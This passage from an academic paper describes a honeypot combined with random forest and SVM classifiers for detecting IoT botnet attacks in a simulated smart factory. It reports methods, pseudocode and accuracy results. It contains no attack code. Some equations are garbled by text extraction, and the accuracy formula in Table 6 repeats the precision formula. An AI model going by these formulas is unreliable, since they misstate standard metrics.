Binary detection is simple in the structure of using 1 and 0. But its detection processing speed is too low to be compatible to smart manufacturing environment which seeks real- time detection (Katz, Piantanida & Debbah, 2017) � Although the command and control (C&C) method targets for HTTP-based botnet detection and expansion, its structure is not simple to implement and the detection result is high false-positive (Fedynyshyn, Chuah & Tan, 2011). � In terms of cost effectiveness, honeypot has an advantage since it requires a relative low cost of construction and management (Aziz, 2011). With an increasing interest in the potential application of machine learning, it offers a new solution for detecting abnormalities in the malicious Internet traffic. In fact, the Internet traffic which allows communication between IoT devices is distinguished from the Internet connectivity which runs on a variety of web server Many Internet-connected devices are such as smartphones, computer, laptops using a variety of web servers. Moreover, for the IoT devices, patterns of the network traffic are repeated in the regularity of network ping with small packets for logging. Applying machine learning in botnet detection for smart factories can become useful to enhance performance of the honeypot model in term of speeding up the processing time or detection time (Lim et al., 2019). Interestingly, there have been very few studies making attempts to mount both honeypot and machine learning on IoT device networks to target attacks on the IoT traffic. Table 2 summarizes a few studies in botnet detection using the approaches of honeypot and/or machine learning. � IoT botnet detection is an approach used to design a detection model based on the binary when botnet attacks IoT device as a hypothesis (Choi, Yang & Kwak, 2018). Although monitoring algorithms for the infected IoT device are simple and easy through web services, capacity of the IoT devices has certain limits as a restriction in the IoT botnet detection. � Another approach to detect botnet is using machine learning which gave a high accuracy in detection at 91.66% (Wang et al., 2020). However, one disadvantage of using machine learning approach is that fast detection is hard to achieve in the randomized number of packets. Consequently, the feasibility of applying this approach for smart manufacturing needs more research looking into real-time factor and accuracy. � Botnet detection using honeypot integrated with IoT, named as IoT honeypot was studied in the environment of smart factories (Dowling, Schukat & Melvin, 2017). In comparison with the machine learning approach by Wang et al. (2020), the IoT honeypot approach is able to gather information at high speed with less resource consumption (Jiafu et al., 2016). Although the IoT honeypot approach has been shown to be scalable by applying it to sandboxes IoT to support high protocols, more expansion in various situations and environments is needed with features to activate the architecture of the IoT devices (Jiafu et al., 2016). Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 6/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ � One study suggested to apply machine learning to detect botnet in the smart factory environment (Park, Li & Hong, 2018). On the one hand, the machine learning approach can reduce the cost as an advantage. On the other hand, low detection rate and high complexity and uncertainty are recognized as big limitations. Thus, it might not suitable for smart factories, unless a construction of machine learning with Kenta-aware intrusion tower system is built, which bears an additional cost. � Advancing from the IoT honeypot approach and the machine learning approach, honeypot combined with machine learning named as honeypot machine learning uses learning logging for detection and tracking at high accuracy (Vishwakarma, 2019). In accordance with most standard equipment at various functions, the honeypot machine learning approach is suitable for the performance of smart factory with a minimal resource required. Hence, it is likely to be adopted in the future (Vishwakarma, 2019). Among those approaches being discussed, IoT botnet and honeypot machine learning approaches shows some effective results in detecting botnets. These two approaches are possible to trace through logging at low cost and are most cost-saving for the IoT devices. Notably, feasibility of applying the honeypot machine learning approach in the smart factory especially has yet to investigate in any studies so far as being highlighted in the recent review work (Seungjin, Abdullah & Jhanjhi, 2020). Therefore, more research in botnet detection should look insight into this particular area for application in smart factory. MATERIALS AND METHODS Proposed model This section is organized to focus on three main aspects. The first and second aspects mention configuration and simulation of hardware in a virtual smart factory environment. The last aspect presents algorithms of the honeypot detection model in combination with machine learning programing. Configuration of hardware for a virtual smart factory environment In the configuration setup, some IoT devices (camera, RFID, temperature sensors) and two raspberry pie devices (Pi1 and Pi2) were used to create a virtual smart factory environment. The first Raspberry Pi (Pi1) was assigned as the actual main IoT data collection server by installing Open CVS. It was responsible for transmitting collected IoT data to the main PC. T-pot platform was chosen because it was suitable for virtual experiments using raspberry and allowed to monitor real-time botnet detection through dashboards. The second raspberry pi (Pi2) was installed with a virtual server (VM) (T-pot platform) So that collection of detection information in such the environment was deliberately established. One assumption was that botnet attacked the raspberry pi 2 (honeypot server) using 10 feature botnet datasets. Raspberry Pi1 and Pi2 were installed on a log server to Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 7/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ keep the information on IoT product line in the factory and records of botnet attack pattern time zone, making it easy to track. Operating mechanism of the honeypot combined machine learning model in smart factory is illustrated in Fig. 4. When an attacker attempted to inject a malicious code through an open port. This step was done by logging into an IoT device at the physical resource/perception layer by combining multiple IDs and passwords. The honeypot intentionally broke into his protective wall and came in as a person who could reach the attacker. The main intention was to obtain information about attackers and malicious code botnets by recording each activity between the device and the intruder in the form of a log file. These log files captured information that allowed administrators to identify characteristics, transformations, target device types, C&C server IP addresses, port numbers of the new malware suites or botnets. Log file data was then converted to an appropriate table format that can be used as a dataset. Table 2 A comparison of studies in botnet detection using honeypot and/or machine learning approaches for smart factories. Approaches Strengths Weaknesses Research gap Refs. Machine learning for smart factory environment Cost reduction Detection rate is very low and the accuracy is low. The system is complicated Building machine learning and Kenta-aware intrusion tower systems for information that will be leaked from manufacturing processes Park, Li & Hong (2018) IoT Botnet Monitoring Web-based real- time IoT equipment. Easy and simple interface Limited capacity New optimization requires expansion of utilization Choi, Yang & Kwak (2018) Machine learning 91.66% graph-based detection accuracy Difficult to apply flow-based detectors A graph-based bot mark is required to increase the accuracy of botnet detection Wang et al. (2020) IoT Honeypot Speed of gathering information is fast. Less resource consumption. Unnecessary data piles up It is necessary to activate network protocol by expanding IoT equipment and sandbox Jiafu et al. (2016) Honeypot machine learning Real-time monitoring with the combination of honeypot and machine learning It is greatly affected by the system environment Problems with device data capacity cloud server application Vishwakarma (2019) Table 1 Comparison of honeypot with other detection methods. Honeypot Binary detection Anomaly detection C&C detection Configuration High-interaction virtual server Binary P2P Command & control server Advantages Monitor the interaction of the grid with infected devices User friendly UI system Easily applicable to multi- connection systems Systems have the capability to detect zero-day attacks as well Able to detect and expand HTTP-based botnets. Disadvantages The analysis of information on an attack is slow and passive Spend a lot of time training Not simple structure high false-positive Not simple structure High false-positive (Zhang et al., 2019; Duessel et al., 2017) (Gerstmayer et al., 2017) (Fenzl et al., 2020) (Fedynyshyn, Chuah & Tan, 2011) Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 8/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ A machine learning (ML) tool was then trained with the dataset which contained 10 network parameters. These parameters were based on the most 10 common features of IoT botnet attacks to smart factory reported in the previous work studying in network architecture and network type used in the physical layer of smart factory, smart home network and smart city (Fan et al., 2020; Almusaylim & Zaman, 2019; Humayun et al., 2019). Algorithm written for this ML tool classified botnet data using R-studio and Weka. Memory-efficient classification was desirable to predict useful information by using less training data to prevent IoT devices from becoming overwhelming. Afterwards, appropriate measures were taken according to the results of the classification. Whenever the course exceeded the allowed size of training data, it would dynamically repeat. Figure 4 Operating mechanisms of botnet attacks to the physical sensing layer of a smart factory and design of the honeypot combined machine learning model. Botnet detection by the honeypot at the physical layer is shown. Full-size DOI: 10.7717/peerj-cs.350/fig-4 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 9/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-4 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Simulation of hardware design with raspberry Pi transfer log files Each product in the smart factory was attached with a Radio-frequency identification (RFID) tag containing information. Camera reads the RFID tags to collect product information. The collected information was then stored in the raspberry Pi1 and Pi2 as the calling terminals. In other words, it was programed to transmit the collected data to the IoT service server of the network through a terminal (camera, temperature, and RFIDIoT devices). The information kept in Pi1 and Pi2 as a log file was then transferred to the server of the main PC. This process simulation is illustrated in Fig. 5. Raspberry Pi1 setting: data transporting Open CV Transporting and receiving of data in this virtual environment were similar to those taking place in the real smart factory. Data transporting Open CV was used as a collection of Python classes that transferred Open CV images and data from the raspberry Pi1 to the main computer via Data transporting Open CV messages. For example, on the main computer screen, video and picture streams were shown simultaneously by sending signal data of raspberry Pi1 as shown in Fig. 6. Algorithm was required for the main PC and raspberry Pi1 for such data transfer as shown in Table 3. Raspberry Pi2 setting: T-pot honeypot platform After Raspberry Pi1 setting with data transporting Open CV, Raspberry Pi2 was set with T-pot honeypot platform followed by virtual machine (VM). Verification and testing were Figure 5 Simulation of hardware design. The collection of product information by Raspberry Pi is shown. Full-size DOI: 10.7717/peerj-cs.350/fig-5 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 10/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-5 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ done on all the honeypot to be balanced at runtime. To do this task, a studio state command line was used to write script and verify the transmission of log file. The script in Fig. 7 shows the load on the platform, the status of each honeypot, and the uptime. Furthermore, the data collected by the honeypot was visually displayed using the Kibana dashboard showing network attacked by malicious users and botnet. The Kibana dashboard shown in Fig. 8 is convenient and comprehensive for analysis of the type, location, and malicious threat actors of botnet attacks. It infiltrated the Raspberry Pi server inside the VM. This had many potential uses for data systems and metrif collection in smart manufacturing environment that required real-time monitoring. Honeypot and machine learning classification process design and algorithms Diagram in Fig. 9 describes the process design for botnet detection by honeypot combined with machine learning classification model. The entire process consisted of two stages. In the first stage (honeypot simulation), it took place at the raspberry Pi2 server which finished its loading by checking botnet credentials and then started the honeypot detection in the T-pot platform. To verify botnet credentials in this step, a user name and password must be provided. Accurate information given by authorized users would be proceeded to start honeypot detection. The verification step took approximately 60 s. Figure 6 Raspberry pi1 image transfer data. Captured data by IoT camera. Full-size DOI: 10.7717/peerj-cs.350/fig-6 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 11/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-6 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Table 3 Algorithm of data transfer in raspberry Pi 1. Algorithm: Raspberry Pi image data transfer 1. Input: List of data transfer 2. Output: PI image data (task mapped to VM) 3. Begin 4. True: CV, VM. Show streamed images and data 5. If 6. two tasks get data from RFID, image, signal then 7. Pick task with earliest 8. Else 9. Transfer data 10. while VM 11. Compute Utilization 12. Sent image, signal each 13. Repeat If data is available & task allocated then 14. Migrate task to less utilized data 15. Else 16. Start scheduling 17. Until all send images as stream 18. Image = Pi Cam read 19. End Figure 7 T-pot test script for raspberry Pi2. User accounts checking in T-Pot. Full-size DOI: 10.7717/peerj-cs.350/fig-7 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 12/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-7 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Moving to stage 2—log data collect, data which was earlier obtained from the authorized users in stage 1, was being processed through a series of steps, that is, retrieve logs, extract records, filter, text processing, upload, end automated process. During the text processing step before uploading, this was where machine learning was integrated with the honeypot for the purpose of classifying botnet attacks as illustrated in Fig. 9. As a result of classification, botnet attacking behaviors or botnet intrusion types were obtained and therefore used for machine learning training to detect botnets. After machine learning classification, processed data was converted to output result file and uploaded to end the automatic process. Algorithm for botnet classification by machine learning is shown in Table 4. Instruction to verify the codes and dataset: 1. Read the package setting for CARET, DPLYR, and READR in the library (this package can balance the dataset for four categories of botnet attacks). 2. Make setting in the computer for dataset with frame set and honeypot log file. Figure 8 Kibana dashboard. Metrics are shown by integrating detection real-time threat charts, maps, and filters. Full-size DOI: 10.7717/peerj-cs.350/fig-8 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 13/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-8 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ 3. Start the test based on the 10 best feature data and wait until the true setting to come out. 4. Proceed to filter, extract records, review logs and test processing. 5. Apply (flgs_number, srate, drate, rate, max, state_number, mean, min, stddev, seq) to each classified category. 6. Obtain log files as samples for machine learning classifying into four types of botnets (Distributed Denial of Service (DDos), Dos, Reconnaissance and Theft). 7. Call in the algorithm (random forest or SVM) to start classification. 8. Predict botnets based on the classification result in term of accuracy, time taken, false positive rate, and p-value. RESULTS In this section, results were collected mainly from the machine learning classification of botnet attacks. The data collection for the experiment was randomized if the reference was used. The experiment was carried out using Raspberry Pi and a personal computer. Features of the selected dataset were first described in Dataset section. To perform the classification on the dataset, honeypot combined machine learning model simulation was run by two techniques that is, Weka, and Rstudio. The collected results were evaluated by comparison between the two, and with other study. Dataset In order to use a machine learning method to identify botnet as the target of IoT-based network and physical layer in smart factories, we experimented with data set 10 features of this paper (Koroniotis et al., 2019), which is the most suitable data set for this study. Dataset used for classification was selected based on ten features which were closely related to the botnet intrusion types. Details of the 10 features are presented in Table 5, which was extracted from a direct comparison of entropy and correlation scores in the previous study (Zheng & Keong, 2011, Koroniotis et al., 2019). Specifically, transmission formation was calculated as correlation indices which were evaluated for their statistical measurement values. The calculation of indices was performed using the following equation. xi ¼ xi � xminð Þ� b � að Þ xmax � xminð Þ þ a Model simulation was evaluated using some of the evaluation metrics of machine learning as shown in Table 6 (Koroniotis et al., 2019). Based on the results, the model can be evaluated whether it is highly efficient in optimization and able to reduce the error of drate. The values of max and min were to represent the values of training and response. Examples of correlation are in Fig. 10 (Koroniotis et al., 2019). Classification by Weka-machine learning Classification result of the Weka-machine learning technique for four types of botnet attacks namely DDoS, DoS, reconnaissance, and theft is shown in Fig. 11. For 76 instances, Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 14/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ the average percentage of correct prediction (accuracy) for all four botnet attacks achieved 96.00526%. The kappa statistic showed the model stability was 0.9466 with a mean absolute error of just 0.0478. In term of accuracy and precision for each type of attacks, reconnaissance has the highest values. Furthermore, after collecting pcap files from the virtual settings, statistical measures using correlation coefficients and entropy techniques were adopted to extract flow data using Argus tools in order to evaluate datasets based on the 10 best features. A new function was created based on the transaction flow of network connections to find out normal and intrusive events. A machine learning model has been trained and validated in different versions of datasets to assess the value of datasets compared to other datasets as shown in Fig. 12. Classification by Rstudio-machine learning Figure 13 shows the results of classification using Rstudio machine learning technique. Two methods were used, that is, support-vector machine (SVM) and random forest (RF). RF was calculated using the decision tree (DT) to predict mean values. RF was selected Figure 9 Process design of honeypot combined machine learning model to detect botnet attacks in smart factory. Honeypot simulation, log data collect classification flowchart. Full-size DOI: 10.7717/peerj-cs.350/fig-9 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 15/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-9 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ because it showed the effective detection in discrete datasets such as botnet (Kok, Abdullah & Jhanjhi, 2020). Evaluation of the classification result were based on nine parameters namely, sensitivity, specificity, pos pred value, neg prered value, prevalence, detection rate, detection prevalence, balance accuracy, average. In the RF method, a high accuracy was achieved at 0.96. The 96% CIs were 0.8875 and 0.9917. The RF provides Kappa at 0.964. However, for SVM method, the accuracy was obtained at 0.7733 which is much lower than that of the RF. The 96% CIs were 0.6666, Table 4 Algorithm for data classification. Algorithm: botnet-based classification ML and honeypot detection for improving the security of smart factory IoT 1. Input: List of Classified 10 feature-valued training data set (t1, t2, t3, …, tn) & VM 2. Output: 10 feature tasks DT 3. Begin 4. Initialization: DT; 1.Sort tasks according to DT ascendingly 5. If 6. DT belongs to same VM 7. TA = testing attribute 8. {combine DT =T; 9. Else 10. Priorities based on (Data set ) 11. For each VM i = to n 12. {calculate Information_gain} 13. Repeat If change is available factor & TA then 14. For (Each DF in the splitting of TA) 15. If (T’ is empty) 16. Else 17. Start get sample again 18. Until all 10 features allocated to a VM 19. End Table 5 Ten Features of the selected dataset for classification. No. Name of features Description 1 srate Foundation-to-target t time packets for each second 2 drate Target-to-foundation packets for each second 3 rate Over-all packets for each second in transaction 4 max Maximum period of collected archives Source 5 state_number Numerical illustration of characteristic state 6 mean Average period of collecting records 7 min Minimum time of collecting records 8 stddev Standard deviation of aggregated records Total 9 flgs_number Numerical representation of feature flags 10 seq Argus sequence number Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 16/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Table 6 Machine learning evaluation metrics. Accuracy ACC ¼ TP TP þ FP Precision PPV ¼ TP TP þ FP Recall TPR ¼ TP TP þ FN Fall-out FPT ¼ FP FP þ TN Notes: TP (True Positive): number of botnet containers represent as botnet. FP (False Positive): number of regular containers symbolized as botnet. TN (True Negative): number of normal containers represent as standard traffic. FN (False Negative): number of botnet containers symbolized as standard traffic. Figure 11 Detailed accuracy by classification. The estimated trend for each botnet type is shown. Full-size DOI: 10.7717/peerj-cs.350/fig-11 Figure 10 Correlation of true vs. false positive rates for the 10 best features. (A) ROC curve for RF, SVM Model (area = 0.701); (B) ROC curve for RF, SVM Model (area = 0.976). Full-size DOI: 10.7717/peerj-cs.350/fig-10 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 17/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-11 http://dx.doi.org/10.7717/peerj-cs.350/fig-10 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ 0.8621. As can be seen in Fig. 13, classification of DDoS attack type is highly efficient using Rstudio with respect to all 9 evaluating parameters. The detection rate and detection prevalence have low probabilities of 0.24 and 0.25 respectively. The overall detection using R-studio showed a statistically significant result since p-value is less than 5%. DISCUSSION The two machine learning programs (Weka and Rstudio) following the random forest algorithm showed good result of classification and comparable with another study as shown in Fig. 14. In the study of Mathur, Raheja & Ahlawat (2018), botnet were detected via mining of the network traffic flow with random committee method. The resultant accuracy of the random committee was achieved at 95.3%, which was 1.3% lower than Figure 12 Correlation of 10 features for Weka-machine learning. Training and Testing Classification result is shown. Full-size DOI: 10.7717/peerj-cs.350/fig-12 Figure 13 R-studio results. The DDoS attack type is highly aggressive. Full-size DOI: 10.7717/peerj-cs.350/fig-13 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 18/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-12 http://dx.doi.org/10.7717/peerj-cs.350/fig-13 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ those obtained in this study at 96.66667% for random forest-Weka and 96% for random forest-Rstudio. In term of time taken, both random forest-Weka and random committee were able to detect botnets within a very short time of 0.00001 s or 0.1 ms. Whereas it took a very much longer time of 19.37 s for the random forest-Rstudio to detect botnets because of its program package. In addition, the p-value representing the significance of the detection models, p value to the random forest-Rstudio was less than 5% (2.2 × 10−16), which showed that the detection model is statistically significant. As mentioned earlier that real time detection is the key factor importance to the network security of the smart factory, random forest method is therefore considered to be highly suitable for the environment of smart factory operating 24/7 in time. The result of this study can be said to be just relatively comparable with the work of Mathur, Raheja & Ahlawat (2018), since both of the studies were based on network traffic flow and targeting at the botnet attack. However, for the feasibility to apply in the smart factory environment, this study shows to be more feasible because of two reasons. First, the experiments were conducted on simulation of hardware specifically configured to mimic the real smart factory environment using IoT devices as mentioned in the proposed model section, which is lacked in the work of Mathur, Raheja & Ahlawat (2018). Secondly, the experimental results obtained in this study addressed directly to the three deciding factors (time taken: 0.1 ms, accuracy: above 96% and FPR: 0.24127, refer to Table 7) which are very useful for evaluating any tested methods being applied in the smart factory. Figure 14 Graphical comparison of random forest in this study with random committee in other study. (A) Accuracy; (B) time taken; (C) p-value and (D) FPR value. Full-size DOI: 10.7717/peerj-cs.350/fig-14 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 19/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-14 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Whereas the latest publication work in 2020 reported that their study was based on smart factory ambient/environment to detect context-aware intrusion using machine learning (Park, Li & Hong, 2020). But there was no mention in that study to target any specific types of cyber attacks or virus, but only for anomaly signs. Another limitation of the study is that its result just stated a very general possibility of process improvement of 29% from 1.29% (Park, Li & Hong, 2020). Without showing the three deciding factors (time taken, accuracy and FPR), it can be hardly possible to evaluate the feasibility to apply for the smart factory. In addition to this point, the part of using machine learning used for training to obtain intrusions did not mention to include the best features of smart factory in the datasets. If including it would be very helpful to increase the feasibility or applicability of any detection models at the physical layers with interconnection of many IoT devices, as this present study were conducted accordingly. Furthermore, the Kibana platform supporting for a visualization of the system/model performance could provide a user-friendly interface for the administrators in the smart factory to analyze from a variety of perspectives more than just a visible display. This study had provided a basic background for developing a security network just for the smart factory environment with a mimicking IoT device hardware configuration and random algorithms for the experimental work. The results can be used as reference points or benchmarks for more comparison with other future studies relating to smart factory. In fact, the number of studies focusing on the security network for smart factory to target specifically botnet attacks using honeypot is currently scarce throughout the literature, future work can based on this smart factory hardware configuration design for the experimental testing for models or systems. Also, it is suggested to further this study by conducting experiments in a real smart factory. By doing that, a better result can be obtained for analysis when many factors of smart factories are taken into consideration. Instead, a controlled virtual smart factory environment was created in this study. The expected results will be more valuable for improving the productivity of smart factories. CONCLUSIONS In this work, the model of combining honeypot with machine learning was proved to be feasible in detecting botnet in the smart factory. Since the botnet can be easily spread into IoT smart factory environment with a high risk, hardware-based simulation and classification using random forest algorithm for Weka machine learning program showed Table 7 Result comparison between random forest with random committee algorithms. Accuracy (%) Time taken (detection time) Fall positive rate (FPR) p-value Refs. Random forest-Weka 96.66667 0.0001 s 0.24127 – This study Random forest-Rstudio 96 19.37 s 0.219 0.05 Random committee 95.3 0.0001 s 0.219 – Mathur, Raheja & Ahlawat (2018) Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 20/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ a very good result. 96.66667% for accuracy, 0.1 ms were achieved for the proposed model to detect botnet and the FPR was low at just 0.24127. Comparing this result to other studies showed that the proposed model (honeypot combined machine learning to detect and classify botnet attack) in the smart factory was evaluated to be better because of three outstanding advantages. First, IoT devices were used in the hardware simulation configured to mimic the real smart factory environment. Second, the result of model testing has showed that with a short time taken: 0.1 ms, high accuracy: above 96% and low FPR: 0.24127 by the random forest Weka machine learning as the deciding factors. Lastly, machine learning have been used the dataset which included the best 10 features of the smart factory for training to obtain intrusions. ACKNOWLEDGEMENTS The author acknowledge the support of Taylor's University, School of Computer Science and Engineer in carrying out this experimental research work. This research work has been underwent for English proofreading prior to submitting to this journal. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Seungjin Lee conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Azween Abdullah analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Nz Jhanjhi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Sh Kok performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data is available at Koroniotis et al. (2019). Code is available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.350#supplemental-information. Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 21/23 http://dx.doi.org/10.7717/peerj-cs.350#supplemental-information http://dx.doi.org/10.7717/peerj-cs.350#supplemental-information http://dx.doi.org/10.7717/peerj-cs.350#supplemental-information http://dx.doi.org/10.7717/peerj-cs.350#supplemental-information http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ REFERENCES Almusaylim ZA, Zaman N. 2019. A review on smart home present state and challenges: linked to context-awareness internet of things (IoT). Wirel Networks 25(6):3193–3204 DOI 10.1007/s11276-018-1712-5. Aziz A. 2011. A soft-decision fusion approach for multiple-sensor distributed binary detection systems. IEEE Transactions on Aerospace and Electronic Systems 47(3):2208–2216 DOI 10.1109/TAES.2011.5937293. Brett S-G, Marco C, Lorenzo C, Bob G, Martin S, Richard K, Christopher K, Giovanni V. 2009. Your botnet is my botnet: analysis of a botnet takeover. In: Proceedings of the ACM Conference on Computer and Communications Security. 635–647. Casalinuovo E. 2019. Thematic investment opportunity: Internet of Things. Pennsylvania: PNC Financial Services Group, Inc. Available at https://www.pnc.com/content/dam/pnc-thought- leadership/PDF/wealth-management/hawthorn/Thematic-Investing_Internet_of_Things.pdf. Chen B, Wan J, Shu L, Li P, Mukherjee M, Yin B. 2017. Smart Factory of Industry 4.0: Key Technologies, Application Case, and Challenges. IEEE Access 6(c):6505–6519 DOI 10.1109/ACCESS.2017.2783682. Choi SK, Yang CH, Kwak J. 2018. System hardening and security monitoring for IoT devices to mitigate IoT security vulnerabilities and threats. KSII Transactions on Internet and Information Systems 12(2):906–918. Dowling S, Schukat M, Melvin H. 2017. A ZigBee honeypot to assess IoT cyberattack behaviour. In: 28th Irish Signals and Systems Conference (ISSC). Piscataway: IEEE, 1–6 DOI 10.1109/ISSC.2017.7983603. Duessel P, Gehl C, Flegel U, Dietrich S, Meier M. 2017. Detecting zero-day attacks using context-aware anomaly detection at the application-layer. International Journal of Information Security 16(5):475–490 DOI 10.1007/s10207-016-0344-y. Fan Y, Zhao G, Li KC, Zhang B, Tan G, Sun X, Xia F. 2020. SNPL: one scheme of securing nodes in IoT perception layer. Sensors 20(4):1–21. Fedynyshyn G, Chuah MC, Tan G. 2011. Detection and classification of different botnet C&C channels. Lecture Notes in Computer Science 6906:228–242. Fenzl F, Rieke R, Chevalier Y, Dominik A, Kotenko I. 2020. Continuous fields: enhanced in-vehicle anomaly detection using machine learning models. Simulation Modelling Practice and Theory 105(June):102143. Gerstmayer F, Hausladen J, Kramer M, Horauer M. 2017. Binary protection framework for embedded systems. In: 2017 12th IEEE International Symposium on Industrial Embedded Systems (SIES), 14–16 June 2017. Piscataway: IEEE. Guo D, Zhong RY, Ling S, Rong Y, Huang GQ. 2020. A roadmap for Assembly 4.0: self-configuration of fixed-position assembly islands under Graduation Intelligent Manufacturing System. International Journal of Production Research 58(15):4631–4646 DOI 10.1080/00207543.2020.1762944. Humayun M, Jhanjhi NZ, Alamri MZ, Khan A. 2019. Smart cities and digital governance: employing recent technologies for improved digital governance. Hershey: IGI Global, 87–106. Ja’fari F, Mostafavi S, Mizanian K, Jafari E. 2020. An intelligent botnet blocking approach in software defined networks using honeypots. Journal of Ambient Intelligence and Humanized Computing DOI 10.1007/s12652-020-02461-6. Jiafu W, Shenglong T, Zhaogang S, Di L, Shiyong W, Muhammad I, Athanasios VV. 2016. Software-defined industrial internet of things in the context of industry 4. 0. IEEE Sensors Journal 16(20):7373–7380. Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 22/23 http://dx.doi.org/10.1007/s11276-018-1712-5 http://dx.doi.org/10.1109/TAES.2011.5937293 https://www.pnc.com/content/dam/pnc-thought-leadership/PDF/wealth-management/hawthorn/Thematic-Investing_Internet_of_Things.pdf https://www.pnc.com/content/dam/pnc-thought-leadership/PDF/wealth-management/hawthorn/Thematic-Investing_Internet_of_Things.pdf http://dx.doi.org/10.1109/ACCESS.2017.2783682 http://dx.doi.org/10.1109/ISSC.2017.7983603 http://dx.doi.org/10.1007/s10207-016-0344-y http://dx.doi.org/10.1080/00207543.2020.1762944 http://dx.doi.org/10.1007/s12652-020-02461-6 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Katz G, Piantanida P, Debbah M. 2017. Distributed binary detection with lossy data compression. IEEE Transactions on Information Theory 63(8):5207–5227 DOI 10.1109/TIT.2017.2688348. Kok SH, Abdullah A, Jhanjhi NZ. 2020. Early detection of crypto-ransomware using pre-encryption detection algorithm. Journal of King Saud University - Computer and Information Sciences DOI 10.1016/j.jksuci.2020.06.012. Koroniotis N, Moustafa N, Sitnikova E, Turnbull B. 2019. Towards the development of realistic botnet dataset in the Internet of Things for network forensic analytics: Bot-IoT dataset. Future Generation Computer Systems 100:779–796 DOI 10.1016/j.future.2019.05.041. Li X, Li D, Wan J, Liu C, Imran M. 2018. Adaptive transmission optimization in SDN-based industrial internet of things with edge computing. IEEE Internet Things Journal 5(3):1351–1360 DOI 10.1109/JIOT.2018.2797187. Lim M, Abdullah A, Jhanjhi NZ, Khurram Khan M, Supramaniam M. 2019. Link prediction in time-evolving criminal network with deep reinforcement learning technique. IEEE Access 7:184797–184807 DOI 10.1109/ACCESS.2019.2958873. Mathur L, Raheja M, Ahlawat P. 2018. Botnet detection via mining of network traffic flow. Procedia Computer Science 132:1668–1677 DOI 10.1016/j.procs.2018.05.137. Mittal S, Khan MA, Romero D, Wuest T. 2019. Smart manufacturing: Characteristics, technologies and enabling factors. Proceedings of the Institution of Mechanical Engineers, Part B: Journal of Engineering Manufacture 233(5):1342–1361 DOI 10.1177/0954405417736547. Ozcelik M, Chalabianloo N, Gur G. 2017. Software-defined edge defense against IoT-based DDoS. In: IEEE CIT 2017 - 17th IEEE International Conference on Computer and Information Technology. Piscataway: IEEE, 308–313. Oztemel E, Gursev S. 2020. Literature review of Industry 4.0 and related technologies. Journal of Intelligent Manufacturing 31(1):127–182 DOI 10.1007/s10845-018-1433-8. Park ST, Li G, Hong JC. 2018. A study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. Journal of Ambient Intelligence and Humanized Computing 11:1405–1412 DOI 10.1007/s12652-018-0998-6. Park ST, Li G, Hong JC. 2020. A study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. Journal of Ambient Intelligence and Humanized Computing 11(4):1405–1412 DOI 10.1007/s12652-018-0998-6. Ramos KSH, Monge MAS, Vidal JM. 2020. Benchmark-based reference model for evaluating botnet detection tools driven by traffic-flow analytics. Sensors 20(16):1–31. Seungjin L, Abdullah A, Jhanjhi NZ. 2020. A review on honeypot-based botnet detection models for smart factory. International Journal of Advanced Computer Science and Applications 11(6):418–435. Smith MS. 2015. Protecting privacy in an 